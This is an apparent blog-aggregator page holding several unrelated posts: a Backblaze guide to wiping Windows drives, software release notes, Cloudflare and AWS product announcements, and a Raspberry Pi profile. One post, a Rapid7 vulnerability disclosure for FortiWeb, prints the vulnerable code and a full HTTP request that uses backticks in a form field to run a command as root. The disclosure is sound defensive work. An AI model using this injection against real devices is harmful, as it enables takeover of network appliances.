  2. Secure Erase Using Third-party Tools: If Reset doesn’t make you feel completely comfortable that your data can’t be recovered, or if you have a PC running Windows 7 or older, you have another option. There are a number of good third-party tools you can use to securely erase your disk, which we’ll get into below. These are different depending on whether you have an HDD or an SSD.

Follow these instructions for different versions of Windows to reset your PC:

How to Wipe a Windows 10 and 11 Hard Drive

  1. Go to Settings → System (Update & Security in Windows 10) → Recovery.
  2. Under “Reset this PC” click “Reset.” (Click “Get Started” in Windows 10.)
  3. Choose “Remove everything.” (If you’re not getting rid of your PC, you can use “Keep my files” to give your computer a good cleaning to improve performance.)
  4. You will be prompted to choose to reinstall Windows via “Cloud download” or “Local reinstall.” If you’re feeling generous and want to give your PC’s next owner a fresh version of Windows, choose “Cloud download.” This will use internet data. If you’re planning to recycle your PC, “Local reinstall” works just fine.
  5. In “Additional settings,” click “Change settings” and toggle “Clean data” to on. This takes longer, but it’s the most secure option.
  6. Click “Reset” to start the process.

How to Wipe a Windows 8 and 8.1 Hard Drive

  1. Go to Settings → Change PC Settings → Update and Recovery → Recovery.
  2. Under “Remove everything and reinstall Windows,” click “Get started,” then click “Next.”
  3. Select “Fully clean the drive.” This takes longer, but it’s the most secure option.
  4. Click “Reset” to start the process.

Secure Erase Using Third-party Tools

If your PC is running an older version of Windows or if you just want to have more control over the erasure process, there are a number of open-source third-party tools to wipe your PC hard drive, depending on whether you have an HDD or an SSD.

Secure Erase an HDD

The process for erasing an HDD involves overwriting the data, and there are many utilities out there to do it yourself:

  1. DBAN: Short for Darik’s Boot and Nuke, DBAN has been around for years and is a well-known and trusted drive wipe utility for HDDs. It does multiple pass rewrites (binary ones and zeros) on the disk. You’ll need to download it to a USB drive and run it from there.
  2. Disk Wipe: Disk Wipe is another free utility that does multiple rewrites of binary data. You can choose from a number of different methods for overwriting your disk. Disk Wipe is also portable, so you don’t need to install it to use it.
  3. Eraser: Eraser is also free to use. It gives you the most control over how you erase your disk. Like Disk Wipe, you can choose from different methods that include varying numbers of rewrites, or you can define your own.

Keep in mind, any disk erase utility that does multiple rewrites is going to take quite a while to complete.

If you’re using Windows 7 or older and you’re just looking to recycle your PC, you can stop here. If you intend to sell or donate your PC, you’ll need the original installation discs (yes, that’s discs with a “c”…remember? Those round shiny things?) to reinstall a fresh version of Windows.

Secure Erase an SSD

If you have an SSD, you may want to take the time to encrypt your data before erasing it to make sure it can’t be recovered. Why? The way SSDs store and retrieve data is different from HDDs.

HDDs store data in a physical location on the drive platter. SSDs store data using electronic circuits and individual memory cells organized into pages and blocks. Writing and rewriting to the same blocks over and over wears out the drive over time. So, SSDs use “wear leveling” to write across the entire drive, meaning your data is not stored in one physical location —it’s spread out.

When you tell an SSD to erase your data, it doesn’t overwrite said data, but instead writes new data to a new block. This has implications for erasing your SSD—some of your data might be hanging around your SSD even after you told it to be erased until such time as wear leveling decides the cells in that block can be overwritten. As such, it’s good practice to encrypt your data on an SSD before erasing it. That way, if any data is left lurking, at least no one will be able to read it without an encryption key.

You don’t have to encrypt your data first, but if Windows Reset is not enough for you and you’ve come this far, we figure it’s a step you’d want to take. Even if you’re not getting rid of your computer or if you have an HDD, encrypting your data is a good idea. If your laptop falls into the wrong hands, encryption makes it that much harder for criminals to access your personal information.

Encrypting your data isn’t complicated, but not every Windows machine is the same. First, check to see if your device is encrypted by default:

  1. Open the Start menu.
  2. Scroll to the “Windows Administrative Tools” dropdown menu.
  3. Select “System Information.” You can also search for “system information” in the taskbar.
  4. If the “Device Encryption Support” value is “Meets prerequisites,” you’re good to go—encryption is enabled on your device.

If not, your next step is to check if your device has BitLocker built in:

  1. Open Settings.
  2. Type “BitLocker” in the search bar.
  3. Click “Manage BitLocker.”
  4. Click “Turn on BitLocker” and follow the prompts.

If neither of those options are available, you can use third-party software to encrypt your internal SSD. VeraCrypt and AxCrypt are both good options. Just remember to record the encryption passcode somewhere and also the OS, OS version, and encryption tool used so you can recover the files later on if desired.

Once you’ve encrypted your data, your next step is to erase, and you have a few options:

  1. Parted Magic: Parted Magic is the most regularly recommended third-party erase tool for SSDs, but it does cost $11. It’s a bootable tool like some of the HDD erase tools—you have to download it to a USB drive and run it from there.
  2. ATA Secure Erase: ATA Secure Erase is a command that basically shocks your SSD. It uses a voltage spike to flush stored electrons. While this sounds damaging (and it does cause some wear), it’s perfectly safe. It doesn’t overwrite the data like other secure erase tools, so there’s actually less damage done to the SSD.

The Nuclear Option

When nothing less than total destruction will do, just make sure you do it safely. I asked around to see if our team could recommend the best way to bust up your drive. Our Senior Systems Administrator, Tim Lucas, is partial to explosives, but we don’t recommend it. You can wipe an HDD with a magnet, otherwise known as “degaussing,” but a regular old fridge magnet won’t work. You’ll need to open up your PC and get at the hard drive itself, and you’ll need a neodymium magnet—one that’s strong enough to obliterate digits (both the ones on your hard drive and the ones on your hand) in the process. Not the safest way to go, either.

If you’re going to tear apart your PC to get at the HDD anyway, drilling some holes through the platter or giving it an acid bath are better options, as our CEO, Gleb Budman, explained in this Scientific American article. Drilling holes distorts the platter, and acid eats away at its surface. Both render an HDD unreadable.

Finally, we still stand by our claim that the safest and most secure way to destroy an HDD, and the only way we’d recommend physically destroying an SSD, is to shred it. Check with your local electronics recycling center to see if they have a shredder you can use (or if they’ll at least let you watch as giant metal gears chomp down on your drive). Shredding it should be a last resort though. Drives typically last five to 10 years, and millions get shredded every year before the end of their useful life. While blowing up your hard drive is probably a blast, we’re pretty sure you can find something even more fun to do with that old drive.

Still have questions about how to securely erase or destroy your hard drives? Let us know in the comments.

The post Getting Rid of Your PC? Here’s How to Wipe a Windows SSD or Hard Drive appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

Security updates for Tuesday

Post Syndicated from original https://lwn.net/Articles/866567/rss

Security updates have been issued by Fedora (firefox), openSUSE (cpio and rpm), Oracle (compat-exiv2-026, exiv2, firefox, kernel, kernel-container, qemu, sssd, and thunderbird), Red Hat (cloud-init, edk2, kernel, kpatch-patch, microcode_ctl, and sssd), and SUSE (cpio, firefox, and libcares2).

Fortinet FortiWeb OS Command Injection

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/08/17/fortinet-fortiweb-os-command-injection/

Fortinet FortiWeb OS Command Injection

An OS command injection vulnerability in FortiWeb’s management interface (version 6.3.11 and prior) can allow a remote, authenticated attacker to execute arbitrary commands on the system, via the SAML server configuration page. This is an instance of CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’) and has a CVSSv3 base score of 8.7. This vulnerability appears to be related to CVE-2021-22123, which was addressed in FG-IR-20-120.

Product Description

Fortinet FortiWeb is a web application firewall (WAF), designed to catch both known and unknown exploits targeting the protected web applications before they have a chance to execute. More about FortiWeb can be found at the vendor’s website.

Credit

This issue was discovered by researcher William Vu of Rapid7. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

An attacker, who is first authenticated to the management interface of the FortiWeb device, can smuggle commands using backticks in the “Name” field of the SAML Server configuration page. These commands are then executed as the root user of the underlying operating system. The affected code is noted below:

int move_metafile(char *path,char *name)
{
int iVar1;
char buf [512];
int nret;
snprintf(buf,0x200,"%s/%s","/data/etc/saml/shibboleth/service_providers",name);
iVar1 = access(buf,0);
if (iVar1 != 0) {
snprintf(buf,0x200,"mkdir %s/%s","/data/etc/saml/shibboleth/service_providers",name);
iVar1 = system(buf);
if (iVar1 != 0) {
return iVar1;
}
}
snprintf(buf,0x200,"cp %s %s/%s/%s.%s",path,"/data/etc/saml/shibboleth/service_providers",name,
"Metadata",&DAT_00212758);
iVar1 = system(buf);
return iVar1;
}

The HTTP POST request and response below demonstrates an example exploit of this vulnerability:

POST /api/v2.0/user/remoteserver.saml HTTP/1.1
Host: [redacted]
Cookie: [redacted]
User-Agent: [redacted]
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://[redacted]/root/user/remote-user/saml-user/
X-Csrftoken: 814940160
Content-Type: multipart/form-data; boundary=---------------------------94351131111899571381631694412
Content-Length: 3068
Origin: https://[redacted]
Dnt: 1
Te: trailers
Connection: close
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="q_type"
1
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="name"
`touch /tmp/vulnerable`
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="entityID"
test
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="service-path"
/saml.sso
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="session-lifetime"
8
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="session-timeout"
30
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="sso-bind"
post
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="sso-bind_val"
1
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="sso-path"
/SAML2/POST
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="slo-bind"
post
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="slo-bind_val"
1
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="slo-path"
/SLO/POST
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="flag"
0
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="enforce-signing"
disable
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="enforce-signing_val"
0
-----------------------------94351131111899571381631694412
Content-Disposition: form-data; name="metafile"; filename="test.xml"
Content-Type: text/xml
<?xml version="1.0"?>
<md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" validUntil="2021-06-12T16:54:31Z" cacheDuration="PT1623948871S" entityID="test">
<md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">
<md:KeyDescriptor use="signing">
<ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:X509Data>
<ds:X509Certificate>test</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</md:KeyDescriptor>
<md:KeyDescriptor use="encryption">
<ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:X509Data>
<ds:X509Certificate>test</ds:X509Certificate>
</ds:X509Data>
</ds:KeyInfo>
</md:KeyDescriptor>
<md:NameIDFormat>urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified</md:NameIDFormat>
<md:SingleSignOnService Binding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-Redirect" Location="test"/>
</md:IDPSSODescriptor>
</md:EntityDescriptor>
-----------------------------94351131111899571381631694412--
HTTP/1.1 500 Internal Server Error
Date: Thu, 10 Jun 2021 11:59:45 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Set-Cookie: [redacted]
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Security-Policy: frame-ancestors 'self'
X-Content-Type-Options: nosniff
Content-Length: 20
Strict-Transport-Security: max-age=63072000
Connection: close
Content-Type: application/json
{"errcode": "-651"}

Note the smuggled ‘touch’ command is concatenated in the mkdir shell command:

[pid 12867] execve("/migadmin/cgi-bin/fwbcgi", ["/migadmin/cgi-bin/fwbcgi"], 0x55bb0395bf00 /* 42 vars */) = 0
[pid 13934] execve("/bin/sh", ["sh", "-c", "mkdir /data/etc/saml/shibboleth/service_providers/`touch /tmp/vulnerable`"], 0x7fff56b1c608 /* 42 vars */) = 0
[pid 13935] execve("/bin/touch", ["touch", "/tmp/vulnerable"], 0x55774aa30bf8 /* 44 vars */) = 0
[pid 13936] execve("/bin/mkdir", ["mkdir", "/data/etc/saml/shibboleth/service_providers/"], 0x55774aa30be8 /* 44 vars */) = 0

Finally, the results of the ‘touch’ command can be seen on the local command line of the FortiWeb device:

/# ls -l /tmp/vulnerable
-rw-r--r--    1 root     0                0 Jun 10 11:59 /tmp/vulnerable
/#

Impact

An attacker can leverage this vulnerability to take complete control of the affected device, with the highest possible privileges. They might install a persistent shell, crypto mining software, or other malicious software. In the unlikely event the management interface is exposed to the internet, they could use the compromised platform to reach into the affected network beyond the DMZ. Note, though, Rapid7 researchers were only able to identify less than three hundred total of these devices that appear to be exposing their management interfaces to the general internet.

Note that while authentication is a prerequisite for this exploit, this vulnerability could be combined with another authentication bypass issue, such as CVE-2020-29015.

Remediation

In the absence of a patch, users are advised to disable the FortiWeb device’s management interface from untrusted networks, which would include the internet. Generally speaking, management interfaces for devices like FortiWeb should not be exposed directly to the internet anyway — instead, they should be reachable only via trusted, internal networks, or over a secure VPN connection.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Git 2.33.0 released

Post Syndicated from original https://lwn.net/Articles/866524/rss

Version 2.33.0
of the Git source-code management system has been released.

As can be seen here, it turns out that this release does not have
many end-user facing changes and new features, but a lot of fixes
and internal improvements went into the codebase during this cycle.
Also, preparation for a new merge strategy backend (can be used
with “git merge -sort” today) is on its final stretch and we are
hoping that it can become the default in the next release.

6 New Ways to Validate Device Posture

Post Syndicated from Kyle Krum original https://blog.cloudflare.com/6-new-ways-to-validate-device-posture/

6 New Ways to Validate Device Posture

6 New Ways to Validate Device Posture

Cloudflare for Teams gives your organization the ability to build rules that determine who can reach specified resources. When we first launched, those rules primarily relied on identity. This helped our customers replace their private networks with a model that evaluated every request for who was connecting, but this lacked consideration for how they were connecting.

In March, we began to change that. We announced new integrations that give you the ability to create rules that consider the device as well. Starting today, we’re excited to share that you can now build additional rules that consider several different factors about the device, like its OS, patch status, and domain join or disk encryption status. This has become increasingly important over the last year as more and more people began connecting from home. Powered by the Cloudflare WARP agent, your team now has control over more health factors about the devices that connect to your applications.

Zero Trust is more than just identity

With Cloudflare for Teams, administrators can replace their Virtual Private Networks (VPNs), where users on the network were trusted, with an alternative that does not trust any connection by default—also known as a Zero Trust model.

Customers start by connecting the resources they previously hosted on a private network to Cloudflare’s network using Cloudflare Tunnel. Cloudflare Tunnel uses a lightweight connector that creates an outbound-only connection to Cloudflare’s edge, removing the need to poke holes in your existing firewall.

Once connected, administrators can build rules that apply to each and every resource and application, or even a part of an application. Cloudflare’s Zero Trust network evaluates every request and connection against the rules that an administrator created before the user is ever allowed to reach that resource.

For example, an administrator can create a rule that limits who can reach an internal reporting tool to users in a specific Okta group, connecting from an approved country, and only when they log in with a hardkey as their second factor. Cloudflare’s global network enforces those rules close to the user, in over 200 cities around the world, to make a comprehensive rule like the outlined above feel seamless to the end-user.

Today’s launch adds new types of signals your team can use to define these rules. By definition, a Zero Trust model considers every request or connection to be “untrusted.” Only the rules that you create determine what is considered trusted and allowed. Now, we’re excited to let users take this a step further and create rules that not only focus on trusting the user, but also the security posture of the device they are connecting from.

More (and different) factors are better

Building rules based on device posture covers a blind spot for your applications and data. If I’m allowed to reach a particular resource, without any consideration for the device I’m using, then I could log in with my corporate credentials from a personal device running an unpatched or vulnerable version of an operating system. I might do that because it is convenient, but I am creating a much bigger problem for my team if I then download data that could be compromised because of that device.

That posture can also change based on the destination. For example, maybe you are comfortable if a team member uses any device to review a new splash page for your marketing campaign. However, if a user is connecting to an administrative tool that manages customer accounts, you want to make sure that device complies with your security policies for customer data that include factors like disk encryption status. With Cloudflare for Teams, you can apply rules that contain multiple and different factors with that level of per-resource granularity.

Today, we are thrilled to announce six additional posture types on top of the ones you can already set:

  1. Endpoint Protection Partners — Verify that your users are running one of our Endpoint Protection Platform providers (Carbon Black, CrowdStrike, SentinelOne, Tanium)
  2. Serial Number — Allow devices only from your known inventory pool
  3. Cloudflare WARP’s proxy — Determine if your users are connected via our encrypted WARP tunnel (Free, Paid or any Teams account)
  4. Cloudflare’s secure web gateway — Determine if your users are connecting from a device managed by your HTTP FIltering policies
  5. (NEW) Application Check — Verify any program of your choice is running on the device
  6. (NEW) File Check — Ensure a particular file is present on the device (such as an updated signature, OS patch, etc.)
  7. (NEW) Disk Encryption — Ensure all physical disks on the device are encrypted
  8. (NEW) OS Version — Confirm users have upgraded to a specific operating system version
  9. (NEW) Firewall — Check that a firewall is configured on the device
  10. (NEW) Domain Joined — Verify that your Windows devices must be joined to the corporate directory

Device rules should be as simple as identity rules

Cloudflare for Teams device rules can be configured in the same place that you control identity-based rules. Let’s use the Disk Encryption posture check as an example. You may want to create a rule that enforces the Disk Encryption check when your users need to download and store files on their devices locally.

To build that rule, first visit the Cloudflare for Teams dashboard and navigate to the Devices section of the “My Team” page. Then, choose “Disk Encryption” as a new attribute to add.

6 New Ways to Validate Device Posture

You can enter a descriptive name for this attribute. For example, this rule should require Windows disk encryption, while others might require encryption on other platforms.

6 New Ways to Validate Device Posture

To save time, you can also create reusable rules, called Groups, to include multiple types of device posture check for reference in new policies later on.

6 New Ways to Validate Device Posture

Now that you’ve created your group, you can create a Zero Trust Require rule to apply your Disk Encryption checks. To do that, navigate to Access > Applications and create a new application. If you already have your application in place, simply edit your application to add a new rule. In the Assign a group section you will see the group you just created—select it and choose a Require rule type. And finally, save the rule to begin enforcing granular, zero trust device posture checks on every request in your environment.

6 New Ways to Validate Device Posture

What’s next

Get started with exploring all device posture attributes in our developer docs. Note that not all posture types are currently available on operating systems and some operating systems don’t support them.

Is there a posture type we’re missing that you’d love to have? We’d love to hear from you in the Community.

Celebrating the community: Toshan

Post Syndicated from Katie Gouskos original https://www.raspberrypi.org/blog/community-stories-toshan-coding-mentor/

Today we bring you the fourth film in our series of inspirational community stories! Incredible young people from the community have collaborated with us to create these videos, where they tell their tech stories in their own words.

Toshan, an Indian teenager in Bangalore.
Toshan had community support when he started learning to code, so now he mentors other young people at his CoderDojo club.

Watch the new film to meet a “mischievous” tech creator who is helping other young people in his community to use technology to bring their ideas to life.

This is Toshan

Toshan’s story takes place in his hometown of Bangalore, India, where his love for electronics and computing sent him on a journey of tech discovery! 

Help us celebrate Toshan by liking and sharing his story on Twitter, Linkedin, or Facebook!

Toshan (16) first encountered coding aged 12, thanks to his computing teacher Miss Sonya. Describing his teacher, he says: “The unique thing is, she just doesn’t stop where the syllabus ends.” The world of digital making and Raspberry Pi computers that Miss Sonya introduced him to offered Toshan “limitless opportunities”, and he felt inspired to throw himself into learning.

“If we help people with their ideas, they might bring something new into the world.”

Toshan

Having found help in his local community and the online Raspberry Pi Foundation community that enabled him to start his tech journey, Toshan decided to pass on his skills: he set up a CoderDojo for other young people in Bangalore when he was 14. Toshan says, “I wanted to give something back.” Mentoring others as they learn coding and digital making helped his confidence grow. Toshan loves supporting the learners at his Dojo with problem-solving because “if we help people with their ideas, they might bring something new into the world.”

Toshan, an Indian teenager, with his mother and father.

Supported by his mum and dad, Toshan’s commitment to helping others create with technology is leading him to extend his community beyond the city he calls home. Through his YouTube channel, he reaches people outside of Bangalore, and he has connected with a worldwide community of like-minded young tech creators by taking part in Coolest Projects online 2020 with an automated hand sanitiser he built.

Toshan’s enthusiasm and love for tech are already motivating him to empower others, and he has only just begun! We are delighted to be a part of his journey and can’t wait to see what he does next.

Help us celebrate Toshan by liking and sharing his story on Twitter, Linkedin, or Facebook!

The post Celebrating the community: Toshan appeared first on Raspberry Pi.

Go 1.17 is released

Post Syndicated from original https://lwn.net/Articles/866496/rss

The Go blog has announced the release of version 1.17 of the Go programming language. The new version has some fairly small changes to the language, support for the Arm 64-bit architecture on Windows, along with other features, bug fixes, and more:

This release brings additional improvements to the compiler, namely a new way of passing function arguments and results. This change has shown about a 5% performance improvement in Go programs and reduction in binary sizes of around 2% for amd64 platforms. Support for more platforms will come in future releases.

See the
release notes for more information.

New – Amazon EC2 M6i Instances Powered by the Latest-Generation Intel Xeon Scalable Processors

Post Syndicated from Danilo Poccia original https://aws.amazon.com/blogs/aws/new-amazon-ec2-m6i-instances-powered-by-the-latest-generation-intel-xeon-scalable-processors/

Last year, we introduced the sixth generation of EC2 instances powered by AWS-designed Graviton2 processors. We’re now expanding our sixth-generation offerings to include x86-based instances, delivering price/performance benefits for workloads that rely on x86 instructions.

Today, I am happy to announce the availability of the new general purpose Amazon EC2 M6i instances, which offer up to 15% improvement in price/performance versus comparable fifth-generation instances. The new instances are powered by the latest generation Intel Xeon Scalable processors (code-named Ice Lake) with an all-core turbo frequency of 3.5 GHz.

You might have noticed that we’re now using the “i” suffix in the instance type to specify that the instances are using an Intel processor. We already use the suffix “a” for AMD processors (for example, M5a instances) and “g” for Graviton processors (for example, M6g instances).

Compared to M5 instances using an Intel processor, this new instance type provides:

  • A larger instance size (m6i.32xlarge) with 128 vCPUs and 512 GiB of memory that makes it easier and more cost-efficient to consolidate workloads and scale up applications.
  • Up to 15% improvement in compute price/performance.
  • Up to 20% higher memory bandwidth.
  • Up to 40 Gbps for Amazon Elastic Block Store (EBS) and 50 Gbps for networking.
  • Always-on memory encryption.

M6i instances are a good fit for running general-purpose workloads such as web and application servers, containerized applications, microservices, and small data stores. The higher memory bandwidth is especially useful for enterprise applications, such as SAP HANA, and high performance computing (HPC) workloads, such as computational fluid dynamics (CFD).

M6i instances are also SAP-certified. For over eight years SAP customers have been relying on the Amazon EC2 M-family of instances for their mission critical SAP workloads. With M6i instances, customers can achieve up to 15% better price/performance for SAP applications than M5 instances.

M6i instances are available in nine sizes (the m6i.metal size is coming soon):

Name vCPUs Memory
(GiB)
Network Bandwidth
(Gbps)
EBS Throughput
(Gbps)
m6i.large 2 8 Up to 12.5 Up to 10
m6i.xlarge 4 16 Up to 12.5 Up to 10
m6i.2xlarge 8 32 Up to 12.5 Up to 10
m6i.4xlarge 16 64 Up to 12.5 Up to 10
m6i.8xlarge 32 128 12.5 10
m6i.12xlarge 48 192 18.75 15
m6i.16xlarge 64 256 25 20
m6i.24xlarge 96 384 37.5 30
m6i.32xlarge 128 512 50 40

The new instances are built on the AWS Nitro System, which is a collection of building blocks that offloads many of the traditional virtualization functions to dedicated hardware, delivering high performance, high availability, and highly secure cloud instances.

For optimal networking performance on these new instances, upgrade your Elastic Network Adapter (ENA) drivers to version 3. For more information, see this article about how to get maximum network performance on sixth-generation EC2 instances.

M6i instances support Elastic Fabric Adapter (EFA) on the m6i.32xlarge size for workloads that benefit from lower network latency, such as HPC and video processing.

Availability and Pricing
EC2 M6i instances are available today in six AWS Regions: US East (N. Virginia), US West (Oregon), US East (Ohio), Europe (Ireland), Europe (Frankfurt), and Asia Pacific (Singapore). As usual with EC2, you pay for what you use. For more information, see the EC2 pricing page.

Danilo

The collective thoughts of the interwebz

By continuing to use the site, you agree to the use of cookies. more information

The cookie settings on this website are set to "allow cookies" to give you the best browsing experience possible. If you continue to use this website without changing your cookie settings or you click "Accept" below then you are consenting to this.

Close